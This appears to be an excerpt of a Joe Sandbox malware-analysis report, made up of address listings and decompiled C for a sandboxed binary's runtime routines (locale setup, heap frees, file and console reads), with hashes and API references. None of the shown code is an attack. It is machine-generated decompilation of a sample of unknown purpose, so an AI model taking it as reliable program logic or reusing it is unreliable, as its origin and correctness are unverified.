                                                0x00c143b7
                                                0x00c144b5
                                                0x00c144b5
                                                0x00000000
                                                0x00c143bd
                                                0x00c143bd
                                                0x00c143be
                                                0x00c143c1
                                                0x00c143c4
                                                0x00c143c5
                                                0x00c143cb
                                                0x00c143e2
                                                0x00c143e6
                                                0x00c143e8
                                                0x00c143f8
                                                0x00c143fb
                                                0x00c143fd
                                                0x00c14400
                                                0x00c14403
                                                0x00c14408
                                                0x00000000
                                                0x00c1440e
                                                0x00c1440e
                                                0x00c14410
                                                0x00c14415
                                                0x00c1443e
                                                0x00c14440
                                                0x00c1444f
                                                0x00c1444f
                                                0x00c14442
                                                0x00c14443
                                                0x00c14448
                                                0x00c1444b
                                                0x00c1444b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c14415
                                                0x00c143ea
                                                0x00c143ef
                                                0x00c143f4
                                                0x00000000
                                                0x00c143f4
                                                0x00c143cd
                                                0x00c143d2
                                                0x00c143d7
                                                0x00c14417
                                                0x00c14417
                                                0x00c14417
                                                0x00c1441a
                                                0x00c1441c
                                                0x00c144b0
                                                0x00c144b0
                                                0x00000000
                                                0x00c14422
                                                0x00c14423
                                                0x00c14428
                                                0x00c1442b
                                                0x00c1442d
                                                0x00c144ba
                                                0x00c144ba
                                                0x00c144bf
                                                0x00c144c0
                                                0x00c144c7
                                                0x00c144cb
                                                0x00c144cc
                                                0x00c144ce
                                                0x00c144d7
                                                0x00c144da
                                                0x00c144df
                                                0x00c144e1
                                                0x00c14613
                                                0x00000000
                                                0x00c144e7
                                                0x00c144e7
                                                0x00c144e8
                                                0x00c144ed
                                                0x00c144f1
                                                0x00c144f4
                                                0x00c144f5
                                                0x00c144f8
                                                0x00c144fc
                                                0x00c144fe
                                                0x00c14506
                                                0x00c1450a
                                                0x00c1450c
                                                0x00c14515
                                                0x00c14517
                                                0x00c14519
                                                0x00c1450e
                                                0x00c1450e
                                                0x00c1450e
                                                0x00c14500
                                                0x00c14500
                                                0x00c14500
                                                0x00c14528
                                                0x00c1452a
                                                0x00c14530
                                                0x00c14559
                                                0x00c1455b
                                                0x00c1456a
                                                0x00c1456a
                                                0x00c1455d
                                                0x00c1455e
                                                0x00c14563
                                                0x00c14566
                                                0x00c14566
                                                0x00000000
                                                0x00c14532
                                                0x00c14532
                                                0x00c14532
                                                0x00c14535
                                                0x00c14537
                                                0x00c14618
                                                0x00c14618
                                                0x00000000
                                                0x00c1453d
                                                0x00c1453e
                                                0x00c14543
                                                0x00c14546
                                                0x00c14548
                                                0x00c1461d
                                                0x00c1461d
                                                0x00c14622
                                                0x00c14623
                                                0x00c14624
                                                0x00c14625
                                                0x00c14626
                                                0x00c14627
                                                0x00c14628
                                                0x00c14629
                                                0x00c1462a
                                                0x00c1462b
                                                0x00c1462c
                                                0x00c1462d
                                                0x00c1462e
                                                0x00c1462f
                                                0x00c14630
                                                0x00c14636
                                                0x00c1463d
                                                0x00c14644
                                                0x00c14645
                                                0x00c14653
                                                0x00c14654
                                                0x00c14655
                                                0x00c14658
                                                0x00c1465c
                                                0x00c14661
                                                0x00c14667
                                                0x00c1466d
                                                0x00c1466f
                                                0x00c14679
                                                0x00c1467e
                                                0x00c14684
                                                0x00c14686
                                                0x00c1468b
                                                0x00c1468b
                                                0x00c1468c
                                                0x00c14691
                                                0x00c14691
                                                0x00c1469d
                                                0x00c146a2
                                                0x00c146a2
                                                0x00c146a8
                                                0x00c146ab
                                                0x00c146b2
                                                0x00c146b5
                                                0x00c146e8
                                                0x00c146e8
                                                0x00000000
                                                0x00c146b7
                                                0x00c146ba
                                                0x00c146bd
                                                0x00c146bf
                                                0x00c146ea
                                                0x00c146ea
                                                0x00c146ee
                                                0x00c14700
                                                0x00c14700
                                                0x00c14702
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c146f0
                                                0x00c146f0
                                                0x00c146f5
                                                0x00c146f8
                                                0x00c14704
                                                0x00c14704
                                                0x00c14706
                                                0x00c14713
                                                0x00c14715
                                                0x00c1471c
                                                0x00c1471f
                                                0x00c14721
                                                0x00c1472f
                                                0x00c14723
                                                0x00c14723
                                                0x00c14726
                                                0x00c14728
                                                0x00c1472a
                                                0x00c1472a
                                                0x00c14728
                                                0x00c14736
                                                0x00c1473a
                                                0x00c14741
                                                0x00c14749
                                                0x00c1474e
                                                0x00c14756
                                                0x00c1475b
                                                0x00c14763
                                                0x00c14768
                                                0x00c1476c
                                                0x00c14771
                                                0x00c14775
                                                0x00c14779
                                                0x00c1477d
                                                0x00c14781
                                                0x00c14783
                                                0x00c148ad
                                                0x00c148b2
                                                0x00c148b3
                                                0x00c148b4
                                                0x00c148b5
                                                0x00c148b6
                                                0x00c148b7
                                                0x00c148b8
                                                0x00c148b9
                                                0x00c148ba
                                                0x00c148bb
                                                0x00c148bc
                                                0x00c148bd
                                                0x00c148be
                                                0x00c148bf
                                                0x00c148c0
                                                0x00c148c4
                                                0x00c148c8
                                                0x00c148ce
                                                0x00c148e2
                                                0x00c148e2
                                                0x00c148e6
                                                0x00c171d1
                                                0x00c171de
                                                0x00c148d0
                                                0x00c148d0
                                                0x00c148d3
                                                0x00c148db
                                                0x00c148de
                                                0x00c1d960
                                                0x00c1d961
                                                0x00c1d968
                                                0x00c1d970
                                                0x00c1d971
                                                0x00c1d972
                                                0x00c1d973
                                                0x00c1d974
                                                0x00c1d975
                                                0x00c1d97a
                                                0x00c1d97d
                                                0x00c1d983
                                                0x00c1d985
                                                0x00c1d987
                                                0x00c1d98a
                                                0x00c1d98a
                                                0x00c1d98c
                                                0x00c1d997
                                                0x00c1d9ae
                                                0x00c148e0
                                                0x00c148e0
                                                0x00000000
                                                0x00c148e0
                                                0x00c148de
                                                0x00c14789
                                                0x00c1478f
                                                0x00c14798
                                                0x00c147a0
                                                0x00c147a6
                                                0x00c147ab
                                                0x00c147ae
                                                0x00c147b6
                                                0x00c147ba
                                                0x00c147bf
                                                0x00c147c2
                                                0x00c147c5
                                                0x00c147c9
                                                0x00c147cd
                                                0x00c147d1
                                                0x00c147d6
                                                0x00c147de
                                                0x00c147e6
                                                0x00c147eb
                                                0x00c147ef
                                                0x00c147f2
                                                0x00c147f4
                                                0x00c147f7
                                                0x00c147fc
                                                0x00c147fc
                                                0x00c147ff
                                                0x00c14803
                                                0x00c1480b
                                                0x00c1480d
                                                0x00c14810
                                                0x00c14815
                                                0x00c14815
                                                0x00c14818
                                                0x00c1481c
                                                0x00c14824
                                                0x00c14826
                                                0x00c14829
                                                0x00c1482e
                                                0x00c1482e
                                                0x00c14831
                                                0x00c14835
                                                0x00c1483d
                                                0x00c1483f
                                                0x00c14842
                                                0x00c14847
                                                0x00c14847
                                                0x00c1484a
                                                0x00c1484e
                                                0x00c14856
                                                0x00c14858
                                                0x00c1485b
                                                0x00c14860
                                                0x00c14860
                                                0x00c14863
                                                0x00c14867
                                                0x00c1486f
                                                0x00c14871
                                                0x00c14874
                                                0x00c14879
                                                0x00c14879
                                                0x00c14880
                                                0x00c14888
                                                0x00c1488e
                                                0x00c14895
                                                0x00c1489a
                                                0x00c1489d
                                                0x00000000
                                                0x00c1489d
                                                0x00c14708
                                                0x00c14708
                                                0x00000000
                                                0x00c14708
                                                0x00c146fa
                                                0x00c146fd
                                                0x00000000
                                                0x00c146fd
                                                0x00c146f8
                                                0x00c146c1
                                                0x00c146c1
                                                0x00c146c8
                                                0x00c146d6
                                                0x00c146d7
                                                0x00c146d9
                                                0x00c146da
                                                0x00c146e7
                                                0x00c146e7
                                                0x00c146bf
                                                0x00c1454e
                                                0x00c1454e
                                                0x00c14551
                                                0x00c14554
                                                0x00c1456c
                                                0x00c14570
                                                0x00c14577
                                                0x00c1457a
                                                0x00c1457f
                                                0x00c14584
                                                0x00c14588
                                                0x00c14589
                                                0x00c145e6
                                                0x00c145e7
                                                0x00c145e8
                                                0x00c145f6
                                                0x00c14602
                                                0x00c14607
                                                0x00c14610
                                                0x00c1458b
                                                0x00c1458b
                                                0x00c1458d
                                                0x00c1458e
                                                0x00c1458f
                                                0x00c145a0
                                                0x00c145a9
                                                0x00c145b0
                                                0x00c145b1
                                                0x00c145b4
                                                0x00c145ba
                                                0x00c145ce
                                                0x00c145ce
                                                0x00c145cf
                                                0x00c145d0
                                                0x00c145d8
                                                0x00c145e3
                                                0x00c145bc
                                                0x00c145bc
                                                0x00c145bf
                                                0x00c145c2
                                                0x00c145c4
                                                0x00c145c7
                                                0x00c145ca
                                                0x00000000
                                                0x00c145cc
                                                0x00c145cc
                                                0x00000000
                                                0x00c145cc
                                                0x00c145ca
                                                0x00c145ba
                                                0x00c14589
                                                0x00c14548
                                                0x00c14537
                                                0x00c14530
                                                0x00c14433
                                                0x00c14433
                                                0x00c14436
                                                0x00c14439
                                                0x00c14451
                                                0x00c14451
                                                0x00c14455
                                                0x00c14458
                                                0x00c1445b
                                                0x00c14464
                                                0x00c1446b
                                                0x00c1446e
                                                0x00c14472
                                                0x00c14475
                                                0x00c144a4
                                                0x00c144a4
                                                0x00c144ad
                                                0x00c14477
                                                0x00c14477
                                                0x00c14479
                                                0x00c14480
                                                0x00c14486
                                                0x00c1449a
                                                0x00c1449a
                                                0x00c1449b
                                                0x00c1449c
                                                0x00000000
                                                0x00c14488
                                                0x00c14488
                                                0x00c1448b
                                                0x00c14493
                                                0x00c14496
                                                0x00000000
                                                0x00c14498
                                                0x00c14498
                                                0x00000000
                                                0x00c14498
                                                0x00c14496
                                                0x00c14486
                                                0x00c14475
                                                0x00c1442d
                                                0x00c1441c
                                                0x00c143cb
                                                0x00c1435f
                                                0x00c1435f
                                                0x00c14364
                                                0x00c14369
                                                0x00c1436b
                                                0x00c14370
                                                0x00c14373
                                                0x00000000
                                                0x00c14373
                                                0x00c14345
                                                0x00c14345
                                                0x00000000
                                                0x00c14345
                                                0x00c14337
                                                0x00c1433a
                                                0x00000000
                                                0x00c1433a
                                                0x00c14335
                                                0x00c1432b
                                                0x00c14321
                                                0x00c141ae
                                                0x00c141b4
                                                0x00c141bd
                                                0x00c141c5
                                                0x00c141cb
                                                0x00c141d0
                                                0x00c141d4
                                                0x00c141d7
                                                0x00c141d9
                                                0x00c141dc
                                                0x00c141e1
                                                0x00c141e1
                                                0x00c141e4
                                                0x00c141e8
                                                0x00c141f0
                                                0x00c141f2
                                                0x00c141f5
                                                0x00c141fa
                                                0x00c141fa
                                                0x00c141fd
                                                0x00c14201
                                                0x00c14209
                                                0x00c1420b
                                                0x00c1420e
                                                0x00c14213
                                                0x00c14213
                                                0x00c14216
                                                0x00c1421a
                                                0x00c14222
                                                0x00c14224
                                                0x00c14227
                                                0x00c1422c
                                                0x00c1422c
                                                0x00c1422f
                                                0x00c14233
                                                0x00c1423b
                                                0x00c1423d
                                                0x00c14240
                                                0x00c14245
                                                0x00c14245
                                                0x00c14248
                                                0x00c1424c
                                                0x00c14254
                                                0x00c14256
                                                0x00c14259
                                                0x00c1425e
                                                0x00c1425e
                                                0x00c14265
                                                0x00c1426d
                                                0x00c14273
                                                0x00c1427a
                                                0x00c1427f
                                                0x00c14282
                                                0x00000000
                                                0x00c14282
                                                0x00c1412d
                                                0x00c1412d
                                                0x00000000
                                                0x00c1412d
                                                0x00c1411f
                                                0x00c14122
                                                0x00000000
                                                0x00c14122
                                                0x00c1411d
                                                0x00c140ef
                                                0x00c140ef
                                                0x00c140f3
                                                0x00c140fe
                                                0x00c140ff
                                                0x00c14101
                                                0x00c1410c
                                                0x00c1410c
                                                0x00c140ed

                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00C14090
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00C140AA
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00C140CB
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00C140F3
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00C1415F
                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00C141B4
                                                • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00C141CB
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00C1426D
                                                • std::_Facet_Register.LIBCPMT ref: 00C14273
                                                  • Part of subcall function 00C15580: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C1558C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegisterstd::invalid_argument::invalid_argument
                                                • String ID: bad locale name
                                                • API String ID: 1592514138-1405518554
                                                • Opcode ID: d01d9a0aec0ee8ec8d8e4e74bdce33a27c6cc12ef1c9a983e269b6eda723718a
                                                • Instruction ID: 0a22dd608cbc384a69fe2f4c022c0e4ae03e1e1d65b4760192663b37383cc1b9
                                                • Opcode Fuzzy Hash: d01d9a0aec0ee8ec8d8e4e74bdce33a27c6cc12ef1c9a983e269b6eda723718a
                                                • Instruction Fuzzy Hash: 9251C0B05043409FD714EF28D885B9FBBE4AF96304F14082DF9589B352E730E989EB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E00C2354B(void* __ebx, void* __edi, void* __esi, char _a4) {
                                                				void* _v5;
                                                				char _v12;
                                                				char _v16;
                                                				char _v20;
                                                				void* __ebp;
                                                				char _t55;
                                                				char _t61;
                                                				void* _t67;
                                                				intOrPtr _t68;
                                                				void* _t72;
                                                				void* _t73;
                                                
                                                				_t73 = __esi;
                                                				_t72 = __edi;
                                                				_t67 = __ebx;
                                                				_t36 = _a4;
                                                				_t68 =  *_a4;
                                                				_t77 = _t68 - 0xc37330;
                                                				if(_t68 != 0xc37330) {
                                                					E00C22F9F(_t68);
                                                					_t36 = _a4;
                                                				}
                                                				E00C22F9F( *((intOrPtr*)(_t36 + 0x3c)));
                                                				E00C22F9F( *((intOrPtr*)(_a4 + 0x30)));
                                                				E00C22F9F( *((intOrPtr*)(_a4 + 0x34)));
                                                				E00C22F9F( *((intOrPtr*)(_a4 + 0x38)));
                                                				E00C22F9F( *((intOrPtr*)(_a4 + 0x28)));
                                                				E00C22F9F( *((intOrPtr*)(_a4 + 0x2c)));
                                                				E00C22F9F( *((intOrPtr*)(_a4 + 0x40)));
                                                				E00C22F9F( *((intOrPtr*)(_a4 + 0x44)));
                                                				E00C22F9F( *((intOrPtr*)(_a4 + 0x360)));
                                                				_v16 =  &_a4;
                                                				_t55 = 5;
                                                				_v12 = _t55;
                                                				_v20 = _t55;
                                                				_push( &_v12);
                                                				_push( &_v16);
                                                				_push( &_v20);
                                                				E00C23377(_t67, _t72, _t73, _t77);
                                                				_v16 =  &_a4;
                                                				_t61 = 4;
                                                				_v20 = _t61;
                                                				_v12 = _t61;
                                                				_push( &_v20);
                                                				_push( &_v16);
                                                				_push( &_v12);
                                                				return E00C233E2(_t67, _t72, _t73, _t77);
                                                			}














                                                0x00c2354b
                                                0x00c2354b
                                                0x00c2354b
                                                0x00c23550
                                                0x00c23556
                                                0x00c23558
                                                0x00c2355e
                                                0x00c23561
                                                0x00c23566
                                                0x00c23569
                                                0x00c2356d
                                                0x00c23578
                                                0x00c23583
                                                0x00c2358e
                                                0x00c23599
                                                0x00c235a4
                                                0x00c235af
                                                0x00c235ba
                                                0x00c235c8
                                                0x00c235d3
                                                0x00c235db
                                                0x00c235dc
                                                0x00c235df
                                                0x00c235e5
                                                0x00c235e9
                                                0x00c235ed
                                                0x00c235ee
                                                0x00c235f8
                                                0x00c235fe
                                                0x00c235ff
                                                0x00c23602
                                                0x00c23608
                                                0x00c2360c
                                                0x00c23610
                                                0x00c23617

                                                APIs
                                                • _free.LIBCMT ref: 00C23561
                                                  • Part of subcall function 00C22F9F: HeapFree.KERNEL32(00000000,00000000,?,00C2BDE5,?,00000000,?,?,?,00C2C088,?,00000007,?,?,00C2C57B,?), ref: 00C22FB5
                                                  • Part of subcall function 00C22F9F: GetLastError.KERNEL32(?,?,00C2BDE5,?,00000000,?,?,?,00C2C088,?,00000007,?,?,00C2C57B,?,?), ref: 00C22FC7
                                                • _free.LIBCMT ref: 00C2356D
                                                • _free.LIBCMT ref: 00C23578
                                                • _free.LIBCMT ref: 00C23583
                                                • _free.LIBCMT ref: 00C2358E
                                                • _free.LIBCMT ref: 00C23599
                                                • _free.LIBCMT ref: 00C235A4
                                                • _free.LIBCMT ref: 00C235AF
                                                • _free.LIBCMT ref: 00C235BA
                                                • _free.LIBCMT ref: 00C235C8
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 3341bab3a276204ff9619ab67028220ee868e69744601336bb26ee7171796910
                                                • Instruction ID: 9bde3f782a211c945384fa7545784f068487e12f7e9a85efe4cfc31c37f05317
                                                • Opcode Fuzzy Hash: 3341bab3a276204ff9619ab67028220ee868e69744601336bb26ee7171796910
                                                • Instruction Fuzzy Hash: 9E219576900128BFCB41EFA4D981DDE7BB9BF08340F0146A6F6159B561EB31EA54EB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,00C325AF), ref: 00C30B3C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DecodePointer
                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                • API String ID: 3527080286-3064271455
                                                • Opcode ID: 22ca7fe6121dfd651b64094582004d6f5b7cd35b3b1779858d610b52fd6ed1ea
                                                • Instruction ID: 00f89e714b41b0ad2a01bfb5cc992deed6ce142d9b7314d19eb5fc694cac7462
                                                • Opcode Fuzzy Hash: 22ca7fe6121dfd651b64094582004d6f5b7cd35b3b1779858d610b52fd6ed1ea
                                                • Instruction Fuzzy Hash: AD51B0B282450ECBCF248F99F86C2ADBBB4FF05304F301245E461AB254C7749A65CB85
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 82%
                                                			E00C300AD(signed int _a4, void* _a8, unsigned int _a12) {
                                                				char _v5;
                                                				signed int _v12;
                                                				unsigned int _v16;
                                                				signed int _v20;
                                                				void* _v24;
                                                				void* _v28;
                                                				long _v32;
                                                				char _v36;
                                                				void* _v40;
                                                				long _v44;
                                                				signed int* _t137;
                                                				signed int _t139;
                                                				intOrPtr _t143;
                                                				unsigned int _t154;
                                                				intOrPtr _t158;
                                                				signed int _t160;
                                                				signed int _t163;
                                                				long _t164;
                                                				intOrPtr _t169;
                                                				signed int _t170;
                                                				intOrPtr _t172;
                                                				signed int _t174;
                                                				signed int _t178;
                                                				void _t180;
                                                				char _t185;
                                                				char _t190;
                                                				signed int _t198;
                                                				signed int _t199;
                                                				signed int _t200;
                                                				signed int _t207;
                                                				long _t210;
                                                				unsigned int _t212;
                                                				intOrPtr _t214;
                                                				unsigned int _t217;
                                                				signed int _t219;
                                                				signed int _t220;
                                                				signed int _t221;
                                                				signed int _t222;
                                                				signed char _t224;
                                                				char _t226;
                                                				signed int _t228;
                                                				void* _t229;
                                                				signed int _t230;
                                                				char* _t231;
                                                				char* _t232;
                                                				signed int _t235;
                                                				signed int _t236;
                                                				void* _t240;
                                                				void* _t242;
                                                				void* _t243;
                                                
                                                				_t198 = _a4;
                                                				_t246 = _t198 - 0xfffffffe;
                                                				if(_t198 != 0xfffffffe) {
                                                					__eflags = _t198;
                                                					if(__eflags < 0) {
                                                						L59:
                                                						_t137 = E00C1DA15(__eflags);
                                                						 *_t137 =  *_t137 & 0x00000000;
                                                						__eflags =  *_t137;
                                                						 *((intOrPtr*)(E00C1DA28( *_t137))) = 9;
                                                						L60:
                                                						_t139 = E00C1D94E();
                                                						goto L61;
                                                					}
                                                					__eflags = _t198 -  *0xc99648; // 0x40
                                                					if(__eflags >= 0) {
                                                						goto L59;
                                                					}
                                                					_t207 = _t198 >> 6;
                                                					_t235 = (_t198 & 0x0000003f) * 0x38;
                                                					_v12 = _t207;
                                                					_t143 =  *((intOrPtr*)(0xc99448 + _t207 * 4));
                                                					_v20 = _t235;
                                                					_v36 = 1;
                                                					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
                                                					__eflags = 1 & _t224;
                                                					if(__eflags == 0) {
                                                						goto L59;
                                                					}
                                                					_t210 = _a12;
                                                					__eflags = _t210 - 0x7fffffff;
                                                					if(__eflags <= 0) {
                                                						__eflags = _t210;
                                                						if(_t210 == 0) {
                                                							L58:
                                                							return 0;
                                                						}
                                                						__eflags = _t224 & 0x00000002;
                                                						if((_t224 & 0x00000002) != 0) {
                                                							goto L58;
                                                						}
                                                						__eflags = _a8;
                                                						if(__eflags == 0) {
                                                							goto L6;
                                                						}
                                                						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
                                                						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
                                                						_v5 = _t226;
                                                						_t240 = 0;
                                                						_t228 = _t226 - 1;
                                                						__eflags = _t228;
                                                						if(_t228 == 0) {
                                                							__eflags =  !_t210 & 0x00000001;
                                                							if(__eflags == 0) {
                                                								L14:
                                                								 *(E00C1DA15(__eflags)) =  *_t149 & _t240;
                                                								 *((intOrPtr*)(E00C1DA28(__eflags))) = 0x16;
                                                								E00C1D94E();
                                                								goto L39;
                                                							} else {
                                                								_t154 = 4;
                                                								_t212 = _t210 >> 1;
                                                								_v16 = _t154;
                                                								__eflags = _t212 - _t154;
                                                								if(_t212 >= _t154) {
                                                									_t154 = _t212;
                                                									_v16 = _t212;
                                                								}
                                                								_t240 = E00C22FD9(_t154);
                                                								E00C22F9F(0);
                                                								E00C22F9F(0);
                                                								_t243 = _t242 + 0xc;
                                                								_v24 = _t240;
                                                								__eflags = _t240;
                                                								if(__eflags != 0) {
                                                									_t158 = E00C27D81(_t198, 0, 0, 1);
                                                									_t242 = _t243 + 0x10;
                                                									_t214 =  *((intOrPtr*)(0xc99448 + _v12 * 4));
                                                									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
                                                									 *(_t235 + _t214 + 0x24) = _t228;
                                                									_t229 = _t240;
                                                									_t210 = _v16;
                                                									_t143 =  *((intOrPtr*)(0xc99448 + _v12 * 4));
                                                									L22:
                                                									_t199 = _v20;
                                                									_t235 = 0;
                                                									_v40 = _t229;
                                                									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
                                                									_t200 = _a4;
                                                									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
                                                										_t180 =  *((intOrPtr*)(_v20 + _t143 + 0x2a));
                                                										_t200 = _a4;
                                                										__eflags = _t180 - 0xa;
                                                										if(_t180 != 0xa) {
                                                											__eflags = _t210;
                                                											if(_t210 != 0) {
                                                												_t235 = 1;
                                                												 *_t229 = _t180;
                                                												_t231 = _t229 + 1;
                                                												_t220 = _t210 - 1;
                                                												__eflags = _v5;
                                                												_v24 = _t231;
                                                												_v16 = _t220;
                                                												 *((char*)(_v20 +  *((intOrPtr*)(0xc99448 + _v12 * 4)) + 0x2a)) = 0xa;
                                                												_t200 = _a4;
                                                												if(_v5 != 0) {
                                                													_t185 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0xc99448 + _v12 * 4)) + 0x2b));
                                                													_t200 = _a4;
                                                													__eflags = _t185 - 0xa;
                                                													if(_t185 != 0xa) {
                                                														__eflags = _t220;
                                                														if(_t220 != 0) {
                                                															 *_t231 = _t185;
                                                															_t232 = _t231 + 1;
                                                															_t221 = _t220 - 1;
                                                															__eflags = _v5 - 1;
                                                															_v24 = _t232;
                                                															_t235 = 2;
                                                															_v16 = _t221;
                                                															 *((char*)(_v20 +  *((intOrPtr*)(0xc99448 + _v12 * 4)) + 0x2b)) = 0xa;
                                                															_t200 = _a4;
                                                															if(_v5 == 1) {
                                                																_t190 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0xc99448 + _v12 * 4)) + 0x2c));
                                                																_t200 = _a4;
                                                																__eflags = _t190 - 0xa;
                                                																if(_t190 != 0xa) {
                                                																	__eflags = _t221;
                                                																	if(_t221 != 0) {
                                                																		 *_t232 = _t190;
                                                																		_t222 = _t221 - 1;
                                                																		__eflags = _t222;
                                                																		_v16 = _t222;
                                                																		_v24 = _t232 + 1;
                                                																		_t235 = 3;
                                                																		 *((char*)(_v20 +  *((intOrPtr*)(0xc99448 + _v12 * 4)) + 0x2c)) = 0xa;
                                                																	}
                                                																}
                                                															}
                                                														}
                                                													}
                                                												}
                                                											}
                                                										}
                                                									}
                                                									_t160 = E00C2F831(_t200);
                                                									__eflags = _t160;
                                                									if(_t160 == 0) {
                                                										L42:
                                                										_v36 = 0;
                                                										L43:
                                                										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0);
                                                										__eflags = _t163;
                                                										if(_t163 == 0) {
                                                											L54:
                                                											_t164 = GetLastError();
                                                											_t235 = 5;
                                                											__eflags = _t164 - _t235;
                                                											if(__eflags != 0) {
                                                												__eflags = _t164 - 0x6d;
                                                												if(_t164 != 0x6d) {
                                                													L38:
                                                													E00C1D9F2(_t164);
                                                													goto L39;
                                                												}
                                                												_t236 = 0;
                                                												goto L40;
                                                											}
                                                											 *((intOrPtr*)(E00C1DA28(__eflags))) = 9;
                                                											 *(E00C1DA15(__eflags)) = _t235;
                                                											goto L39;
                                                										}
                                                										_t217 = _a12;
                                                										__eflags = _v32 - _t217;
                                                										if(_v32 > _t217) {
                                                											goto L54;
                                                										}
                                                										_t236 = _t235 + _v32;
                                                										__eflags = _t236;
                                                										L46:
                                                										_t230 = _v20;
                                                										_t169 =  *((intOrPtr*)(0xc99448 + _v12 * 4));
                                                										__eflags =  *((char*)(_t230 + _t169 + 0x28));
                                                										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
                                                											__eflags = _v5 - 2;
                                                											if(_v5 == 2) {
                                                												__eflags = _v36;
                                                												_push(_t236 >> 1);
                                                												_push(_v40);
                                                												_push(_t200);
                                                												if(_v36 == 0) {
                                                													_t170 = E00C2FC18();
                                                												} else {
                                                													_t170 = E00C2FF1E();
                                                												}
                                                											} else {
                                                												_t218 = _t217 >> 1;
                                                												__eflags = _t217 >> 1;
                                                												_t170 = E00C2FDC7(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
                                                											}
                                                											_t236 = _t170;
                                                										}
                                                										goto L40;
                                                									}
                                                									_t219 = _v20;
                                                									_t172 =  *((intOrPtr*)(0xc99448 + _v12 * 4));
                                                									__eflags =  *((char*)(_t219 + _t172 + 0x28));
                                                									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
                                                										goto L42;
                                                									}
                                                									_t174 = GetConsoleMode(_v28,  &_v44);
                                                									__eflags = _t174;
                                                									if(_t174 == 0) {
                                                										goto L42;
                                                									}
                                                									__eflags = _v5 - 2;
                                                									if(_v5 != 2) {
                                                										goto L43;
                                                									}
                                                									_t178 = ReadConsoleW(_v28, _v24, _v16 >> 1,  &_v32, 0);
                                                									__eflags = _t178;
                                                									if(_t178 != 0) {
                                                										_t217 = _a12;
